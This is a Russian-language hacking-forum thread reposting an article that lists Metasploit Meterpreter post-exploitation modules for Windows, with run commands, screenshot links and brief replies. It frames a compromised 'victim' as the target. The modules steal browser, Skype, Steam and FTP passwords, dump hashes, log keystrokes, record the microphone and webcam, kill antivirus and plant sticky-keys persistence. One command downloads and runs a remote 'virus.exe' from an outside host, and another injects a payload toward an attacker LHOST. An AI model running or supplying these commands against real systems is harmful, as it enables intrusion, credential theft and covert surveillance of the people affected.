ANTICHAT
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)
-   -   Meterpreter(Metasploit) - Windows модули (https://forum.antichat.xyz/showthread.php?t=449262)

Veil 14.03.2017 21:22
Предупреждение: Все авторские права и сама статью принадлежат нашему форумчанину

SooLFaa.

http://s020.radikal.ru/i706/1703/4a/47e53c3d0c84.png


Я с его предварительного разрешения только публикую на Античате статью.Так как считаю,что такая фундаментальная статья будет украшением нашего форума.

Здравия желаю, дамы господа. О чём поговорим сегодня? МЕТЕРПРЕТЕР

Для тех кто не вкурсе это очень большой шеллкод с кучей возможностей и сегодня мы рассмотрим, что умеет метерпретер для Windows машин.

Так же отсылаю Вас в свою тему про метасплоит где Вы познакомитесь с некоторыми общими понятиями.

Ну что?!Поехали?!

Итак, мы получили сессию и что дальше нам надо сделать с помощью могучего метерпретера?!

Для начала перечислим списком модули, которые будем рассматривать. Для удобного поиска тем, кто будет обращаться к этому топику.
  • run post/windows/gather/enum_devices - получить список установленных устройств;
  • run post/multi/gather/check_malware проверить файл на VIRUS TOTAL'е
  • run post/windows/gather/enum_dirperms найти привилегированные пути в Windows
  • run post/windows/gather/enum_domain – перечислить все доступные домены в Active Directory
  • run post/multi/gather/dns_bruteforce – хотим побрутить домен используя чужие ресурсы? Ноу проблемо эта опция для вас.
  • run post/multi/gather/dns_reverse_lookup - Вы станете днс сервером для Вашего клиента. Соотсветственно можно манипулировать службами DNS.
  • run post/windows/gather/enum_domain_tokens - Воруем токены авторизованных пользователей в Windows
  • run post/multi/gather/enum_vbox - чекаем на наличие Virtual Box машины
  • run post/windows/gather/enum_domains – получить список доменов
  • run post/multi/gather/env – получить переменные окружения полезно так же при эскалациях.
  • run post/multi/gather/filezilla_client_cred – Из моих любимых выдернуть пароли из файлзиллы
  • run post/windows/gather/enum_files – собирает различные конфиги и дат файлы полезная опция при ресерче жертвы
  • run post/multi/gather/find_vmx – получить список всех виртуальных машин
  • run post/windows/gather/enum_hostfile читаем hosts файл
  • run post/multi/gather/firefox_creds крадем пароли из firefox
  • run post/windows/gather/enum_ie – так же для ie
  • run post/windows/gather/enum_ms_product_keys – Воруем ключики лицензий
  • run post/multi/gather/ping_sweep – пингуем хосты
  • run post/windows/gather/enum_powershell_env – получить переменные окружения powershell
  • run post/multi/gather/run_console_rc_file – запустить в консоли rc файл
  • run post/windows/gather/enum_proxy – чекаем на прокси сервер (актуально чаще для организаций)
  • run post/multi/gather/skype_enum – Получить СКАЙП ПАРОЛИ
  • run post/windows/gather/enum_putty_saved_sessions – получаем сессии в PUTTY (SSH)
  • run post/multi/gather/thunderbird_creds – получить пароли с почтового клиента
  • run post/windows/gather/enum_services – получить список сервисов запущенных на машине. Удобно отследить сервисы.
  • run post/multi/gather/wlan_geolocate – узнать локацию интерфейса wlan
  • run post/windows/gather/enum_shares – получить список общих дисков
  • run post/multi/general/close – закрыть сессию метерпретер
  • run post/windows/gather/enum_snmp – чекаем на snmp
  • run post/multi/general/execute(аналог execute) – выполнить cmd команду в консоли жертвы
  • run post/windows/gather/enum_termserv – получить список серверов к которым коннектилась жертва
  • run post/windows/gather/enum_tokens – перечислить токено - залогиненных пользователей в системе
  • run post/windows/gather/enum_trusted_locations – получить интересные пути к файлам
  • run post/multi/manage/play_youtube – запустить видео в ютуб
  • run post/multi/manage/record_mic – запись звука с микрофона. Параметр задает время записи
  • run post/multi/manage/set_wallpaper – установить СВОИ обои
  • run post/windows/gather/forensics/duqu_check – проверить на уязвимость в Word при замене параметра Trueype
  • run post/multi/recon/local_exploit_suggester – прочекать систему на некоторые сплоиты
  • run post/windows/gather/forensics/enum_drives - перечисление драйверов работает криво
  • run post/windows/capture/keylog_recorder – классный кейлоггер
  • run post/windows/capture/lockout_keylogger ещё кейлоггер по мощнее
  • run post/windows/escalate/droplnk - создает вредный ярлычок, который если жертва запустит получим админа работает до win7
  • run post/windows/gather/hashdump – получить хэши паролей
  • run post/windows/escalate/getsystem – стандартная повышалка привелегий, работает очень редко
  • run post/windows/escalate/golden_ticket - отличный способ эскалации в доменах
  • run post/windows/escalate/ms10_073_kbdlayout – ещё один способ эскалации эксплоит до win7
  • run post/windows/escalate/screen_unlock - залочить текущий момнитор
  • run post/windows/gather/memory_grep – поиск утечет памяти в процессе
  • run post/windows/gather/ad_to_sqlite – Вся информация об Active directory в базу
  • run post/windows/gather/bitcoin_jacker – очень повезёт если схватите тачку на которой майнят биткоины
  • run post/windows/gather/phish_windows_credentials – фишинговая форма входа на powershell после ввода пасса отдаёт обратно хакеру.
  • run post/windows/gather/checkvm - проверить не на виртуалке ли мы.
  • run post/windows/gather/screen_spy – типа скриншотера, делает 1 скрин в секунду и создается иллюзия наблюдения за столом
  • run post/windows/gather/smart_hashdump если не работает хэшдамп можно попробовать
  • run post/windows/gather/credentials/bulletproof_ftp – парольчики с этого клиента
  • run post/windows/gather/tcpnetstat – получаем аналог команды netstat
  • run post/windows/gather/usb_history – Информация о флешках побывавших в компьютере и устройствах
  • run post/windows/gather/win_privs – Права текущего пользователя
  • run post/windows/gather/credentials/domain_hashdump - получить хэшик группы в адешке
  • run post/windows/gather/credentials/enum_cred_store – пытаемся брутфорснуть креды пользователей
  • run post/windows/gather/credentials/enum_cred_store – пытаемся брутфорснуть креды пользователей
  • run post/windows/manage/add_user_domain –Добавляем пользователя в домен
  • run post/windows/manage/autoroute – хотим начать хекать хосты на нашей атакованной машине, так проложить маршруты надо сначала
  • run post/windows/gather/credentials/enum_picasa_pwds воруем пароли от пикасы, надо мигрировать в explorer
  • run post/windows/gather/credentials/filezilla_server – чекаем на наличие файлзиллы
  • run post/windows/manage/delete_user – удалить пользователя
  • run post/windows/manage/download_exec – скачать и запустить
  • run post/windows/manage/enable_rdp включаем РДПшечку
  • run post/windows/gather/credentials/gpp - получаем групповые политики в домене
  • run post/windows/manage/enable_support_account – открыть саппорт аккаунт
  • run post/windows/gather/credentials/heidisql – получить паролики от Heidi
  • run post/windows/manage/exec_powershell моя любимая фитчка, выполнить ps команду
  • run post/windows/manage/forward_pageant – пропускаем ssh через себя
  • run post/windows/manage/inject_ca – очень классная фитча позволяет внедрить свой са сертификат и имея у себя приватный и публичный ключ расшифровывать SSL трафик.
  • run post/windows/manage/inject_host - внедрить host в файл hosts
  • run post/windows/manage/killav попытка задушить популярные процессы
  • run post/windows/manage/migrate – мигрировать в процесс, скрывает процесс шелкода, а так же позволяет повысить привилегии и закрепиться. Многие фитчи не работают из другого процесса.
  • run post/windows/manage/multi_meterpreter_inject – очень полезная фитча, когда нужно внедрить другой payload например выше разрядностью
  • run post/windows/gather/credentials/outlook – получить список конфигов в outlook
  • run post/windows/manage/payload_inject - аналогично multi_meterpreter_inject но как видно из названий ОС зависимый.
  • run post/windows/gather/credentials/skype - украсть пароли в скайп
  • run post/windows/manage/powershell/build_net_code – Скомпилировать .Net файл с помощью компилятора powershell, очень удобно чтобы пробросить свой код на C#.
  • run post/windows/manage/powershell/exec_powershell – хотим выполнить ps команду не проблема. По умолчанию валит ошибку но команду все равно выполняет
  • run post/windows/manage/priv_migrate – ЭСКАЛАЦИЯ пытается мигрировать в привилегированный процесс, что после миграции дает права пользователя с бОльшими

    привилегиями.
  • run post/windows/gather/credentials/steam – ВОРУЕЕЕМ ПАРОЛИИ СТИИИИМММ
  • run post/windows/gather/credentials/tortoisesvn – пытаемся вытянуть конфиги к репам из известного клиента SVN Turtoise
  • run post/windows/manage/reflective_dll_inject – DLL Инъекция в процесс. Путь к DLL и процессу куда инжектим DLLку, об этом я писал статью здесь
  • run post/windows/manage/remove_ca – удалить са поможет для того чтобы сломать ssl и выпустить новый
  • run post/windows/gather/credentials/vnc – получить креды от vnc
  • run post/windows/manage/rpcapd_start - пишем траффик с удаленной тачки
  • run post/windows/gather/credentials/windows_autologin – получить креды автологина очень часто используется.
  • run post/windows/manage/sticky_keys – ОТЛИЧНЫЙ ПЕРСИСТЕНС срабатывает когда нажат SHIFT 5 раз или горячие клавиши с WINDOWS
  • run post/windows/manage/wdigest_caching – фитча, с помощью которой, мы можем получить пароли пользователя плейнтекстом с помощью mimikatz
  • run post/windows/manage/webcam Сфоткаемся?

    > webcam_snap -i 1 -v false Я обычно юзаю так
  • run post/windows/gather/enum_applications – получить список установленных тулз
  • run post/windows/gather/enum_av_excluded – получения программы в исключениях антивируса удобно для миграции и ав бйпасса.
  • run post/windows/gather/enum_chrome а вот об этом я подробно писал тут
  • run post/windows/gather/enum_db – Установленные базы данных
Теперь Скриншотики

run post/windows/gather/enum_devices

http://s019.radikal.ru/i611/1703/aa/75327a09a4ec.png

Результат:

http://s020.radikal.ru/i703/1703/39/8ee3f68ff6b1.png

run post/multi/gather/check_malware REMOTEFILE=c:\\windows\\system32\\cmd.exe

http://s61.radikal.ru/i174/1703/fe/9249c27c570b.png

run post/windows/gather/enum_dirperms

http://s020.radikal.ru/i705/1703/6b/056a92903f3f.png

run post/multi/gather/dns_bruteforce DOMAIN=www.ya.ru

http://s020.radikal.ru/i721/1703/16/c274792b2892.png

run post/multi/gather/enum_vbox

http://s50.radikal.ru/i130/1703/21/bd37c40e7993.png

run post/windows/gather/enum_domains

http://s09.radikal.ru/i182/1703/43/db7453e88c41.png

run post/multi/gather/env

http://s45.radikal.ru/i109/1703/cf/2fee4771fc64.png

run post/multi/gather/filezilla_client_cred

http://s020.radikal.ru/i701/1703/e5/b336e3330f2d.png

run post/windows/gather/enum_files

http://s020.radikal.ru/i709/1703/d2/c1deabf1de03.png

run post/multi/gather/find_vmx

http://s019.radikal.ru/i630/1703/c9/cf93d3670fef.png

run post/windows/gather/enum_hostfile

http://s50.radikal.ru/i128/1703/6a/e20230626a1e.png

От себя: громадное спасибо SooLFaa за разрешение и в дальнейшем публиковать его статьи, а их немало, в дальнейшем печатать его статьи.

Продолжение следует...

Veil 14.03.2017 21:31
run post/multi/gather/firefox_creds

http://s014.radikal.ru/i327/1703/23/a8bd61133a7a.png

run post/windows/gather/enum_ie

http://s019.radikal.ru/i635/1703/f5/fa988caa1228.png

run post/windows/gather/enum_powershell_env

http://s020.radikal.ru/i717/1703/56/aaaf973a1840.png

run post/multi/gather/run_console_rc_file

http://s42.radikal.ru/i096/1703/37/a4d425e54ef7.png

run post/windows/gather/enum_proxy

http://s019.radikal.ru/i644/1703/eb/aa699c6719bd.png

run post/windows/gather/enum_putty_saved_sessions

http://s019.radikal.ru/i611/1703/cc/d1b517eaeeaa.png

run post/windows/gather/enum_services

http://s020.radikal.ru/i714/1703/8b/03a8b1681224.png

Продолжение следует...

Veil 14.03.2017 21:36
run post/multi/gather/wlan_geolocate

http://s45.radikal.ru/i108/1703/2c/472bb0f56680.png

run post/windows/gather/enum_shares

http://s45.radikal.ru/i107/1703/08/abecbe50f4cb.png

run post/multi/general/execute

http://s014.radikal.ru/i327/1703/61/9249750f1020.png

run post/windows/gather/enum_termserv

http://s020.radikal.ru/i722/1703/e6/1fedb12127bb.png

run post/windows/gather/enum_trusted_locations

http://s013.radikal.ru/i323/1703/44/12d455ea0e57.png

run post/multi/manage/play_youtube

http://s56.radikal.ru/i154/1703/5c/eee403f44276.png

run post/multi/manage/record_mic

http://s012.radikal.ru/i320/1703/2e/b7e775cedaef.png

run post/windows/gather/forensics/browser_history

http://s015.radikal.ru/i330/1703/36/ad53b602071b.png

run post/windows/gather/forensics/duqu_check

http://s020.radikal.ru/i702/1703/01/f35a8981dc9e.png

run post/multi/recon/local_exploit_suggester

http://s008.radikal.ru/i305/1703/76/3281e7bb4f28.png

run post/windows/gather/forensics/enum_drives

http://s019.radikal.ru/i641/1703/4e/4d8cc6990d2f.png

run post/windows/capture/keylog_recorder

http://s09.radikal.ru/i182/1703/13/d609747ec6e0.png

Результат

http://s019.radikal.ru/i636/1703/58/682fdc5e75c7.png

run post/windows/gather/forensics/recovery_files

http://s019.radikal.ru/i601/1703/07/1673ea316803.png

run post/windows/escalate/droplnk

http://s008.radikal.ru/i306/1703/f0/02d90c13f876.png

run post/windows/gather/hashdump

http://s019.radikal.ru/i611/1703/0b/cd4bb191f0e2.png

Продолжение следует...

Veil 14.03.2017 21:46
run post/windows/escalate/getsystem

http://s020.radikal.ru/i709/1703/6a/d8399353dee4.png

run post/windows/gather/phish_windows_credentials

http://s014.radikal.ru/i327/1703/53/cd2a3c71acbb.png

run post/windows/gather/checkvm

http://s09.radikal.ru/i182/1703/16/182be0a509c2.png

run post/windows/gather/screen_spy

http://s019.radikal.ru/i603/1703/89/0bb98c2a591f.png

run post/windows/gather/tcpnetstat

http://s019.radikal.ru/i641/1703/2f/b15e43d7b6e6.png

run post/windows/gather/credentials/coreftp

http://s020.radikal.ru/i718/1703/75/5d86e697ca11.png

run post/windows/gather/usb_history

http://i045.radikal.ru/1703/bb/bc9bcb11f15b.png

run post/windows/gather/win_privs

http://s019.radikal.ru/i614/1703/2e/7fcd868c312b.png

run post/windows/gather/credentials/domain_hashdump

http://i079.radikal.ru/1703/cd/b996e0568e97.png

run post/windows/gather/credentials/enum_cred_store

http://s61.radikal.ru/i174/1703/88/632e761c28f5.png

run post/windows/manage/add_user_domain

http://s019.radikal.ru/i617/1703/b8/7cb7468a7456.png

run post/windows/manage/autoroute

http://s020.radikal.ru/i719/1703/67/fe1802b02531.png

run post/windows/gather/credentials/enum_picasa_pwds

http://s010.radikal.ru/i312/1703/a5/74d2cce0288e.png

Продолжение следует....

Veil 14.03.2017 21:50
run post/windows/gather/credentials/filezilla_server

http://s014.radikal.ru/i328/1703/24/0df1d102f795.png

run post/windows/manage/download_exec URL=http://rgho.st/download/8qqcN4rMP/87...1d84/virus.exe EXECUTE=true

http://s019.radikal.ru/i604/1703/b7/438699b8d975.png

run post/windows/gather/credentials/gpp

http://s014.radikal.ru/i329/1703/e0/7e0ddbb0b55f.png

run post/windows/manage/exec_powershell

http://s020.radikal.ru/i712/1703/f0/075b0f0b4ce8.png

run post/windows/manage/forward_pageant

http://s019.radikal.ru/i621/1703/b9/68a03be0610c.png

run post/windows/manage/inject_host DOMAIN=www.ya.ru IP=87.240.165.82

http://s019.radikal.ru/i616/1703/2c/de882ca58bbd.png

run post/windows/manage/killav

http://s50.radikal.ru/i130/1703/54/fedefcbeda04.png

run post/windows/manage/migrate

http://s020.radikal.ru/i718/1703/22/8e86c4157243.png

run post/windows/manage/multi_meterpreter_inject

http://s020.radikal.ru/i703/1703/df/55bc354afc77.png

run post/windows/gather/credentials/outlook

http://s020.radikal.ru/i717/1703/55/48b3cb47d933.png

run post/windows/manage/payload_inject LHOST=192.168.1.237 LPORT=1341

http://s011.radikal.ru/i317/1703/93/6c96bd698adf.png

run post/windows/gather/credentials/skype

http://s50.radikal.ru/i130/1703/77/3b5dbd7c17c0.png

run post/windows/manage/powershell/exec_powershell

http://s019.radikal.ru/i634/1703/78/20b9a1b45ee3.png

Результат:

http://s009.radikal.ru/i308/1703/bc/02497e2a8eb2.png

run post/windows/manage/priv_migrate

http://s020.radikal.ru/i700/1703/2f/094696e89213.png

Результат:

http://s020.radikal.ru/i709/1703/51/793a430c451b.png

run post/windows/gather/credentials/tortoisesvn

http://s12.radikal.ru/i185/1703/06/b5d8db8c38e5.png

run post/windows/manage/sticky_keys

http://s61.radikal.ru/i174/1703/28/870e9bc87c79.png

продолжение следует...

Veil 14.03.2017 21:52
run post/windows/manage/wdigest_caching

http://s50.radikal.ru/i129/1703/fc/78625cfc4ad3.png

run post/windows/gather/enum_applications

http://s020.radikal.ru/i703/1703/f4/e465ceeb4a65.png

run post/windows/gather/enum_av_excluded

http://s008.radikal.ru/i306/1703/28/55118b7545b7.png

run post/windows/gather/enum_db

http://s020.radikal.ru/i714/1703/96/b4ec50279076.png

Post interrupted by the console user – увидели такую ошибку используйте вместо опции

run use или попробуйте мигрировать в процесс

altblitz 14.03.2017 22:19
Лёха @ Skype/3ahac126 - Почём баклажаны на привозе?

Veil 14.03.2017 22:21
Да Блиц это его статья . Я у него попросил разрешение разместить на ачате,он был не против.

SooLFaa 14.03.2017 23:40
Если ачату интересно - ради бога. Я только за. Спасибо ТС за то, что потратил время и форкнул даже со всеми скринами. Но я обычно по скромнее себя вёл. Свои статьи писал в раздел Песочница, а оттуда если ЯР посчитает нужным перенесет сам (на моей памяти такого ещё не было, но и для ачата я написал всего 2 - 3 статьи).

Majgap 15.03.2017 19:44
Цитата:
Сообщение от SooLFaa

Если ачату интересно - ради бога. Я только за. Спасибо ТС за то, что потратил время и форкнул даже со всеми скринами. Но я обычно по скромнее себя вёл. Свои статьи писал в раздел Песочница, а оттуда если ЯР посчитает нужным перенесет сам (на моей памяти такого ещё не было, но и для ачата я написал всего 2 - 3 статьи).
Да хороший универсальный скрипт+эксплоит! На вифислаксе интересно он будет работать и там может уже установлен метасплоит в Новом Вифислаксе 64.01?


Время: 16:25
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице